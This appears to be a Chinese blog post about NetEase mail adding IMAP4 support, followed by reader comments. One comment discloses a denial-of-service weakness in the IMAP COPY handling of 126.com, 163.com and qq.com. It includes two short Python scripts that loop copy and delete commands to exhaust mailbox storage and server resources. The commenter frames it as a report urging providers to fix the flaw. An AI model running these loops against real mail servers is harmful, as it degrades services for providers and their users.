网易邮箱开始支持 IMAP4 了

我得说我们的进度确实延误了...总之,1季度 sohu 的 IMAP4 也会有的.

Topic: 技术

评论

赞,静等

网易邮箱老早就支持IMAP的,只是一直没开放而已

发现主流的支持imap协议的邮件系统供应商(比如126.com, 163.com, qq.com等),都没有对copy指令进行约束,这样可能会导致下面的一个漏洞:
import getpass, imaplib
M = imaplib.IMAP4('imap.126.com',143)
M.login('126邮箱账号', '126邮箱密码')
while 1:
M.select('aaa')
M.copy('1:*', 'bbb');
M.select('bbb')

M.copy('1:*', 'aaa');

上述脚本,可以使得服务器在两个目录之间的邮件来回复制,最终导致 aaa,bbb两个目录的邮件都以指数级别的速度增加邮件数量,几分钟之内就可以让用户的邮箱用光所有邮箱容量。如果用户是126那种不限容量的客户,那更大问题了。

上述指令的好处是,客户端和服务器没有很大的通讯量,就可以让服务器消耗很多资源拷贝邮件(webmail和pop都没有办法做到)。另外,上述脚本还可以改进,做成每次都从aaa目录拷贝邮件到bbb, 然后清空bbb,再下一次拷贝
import getpass, imaplib
while 1:
try:
M = imaplib.IMAP4('imap.126.com',143)
M.debug = 4;
M.login('xxx@126.com', 'xxxx')
while 1:
M.select('aaa')
try:
M.store('1:*', '+FLAGS.SILENT', '\\Deleted');
except:
print "NO Store\n"
M.expunge()
M.select('bbb')
M.copy('1:*', 'aaa');
except:

print "Unexpected error\n"

这算不算服务器的一个拒绝服务攻击漏洞?希望各大邮件运营商尽快堵上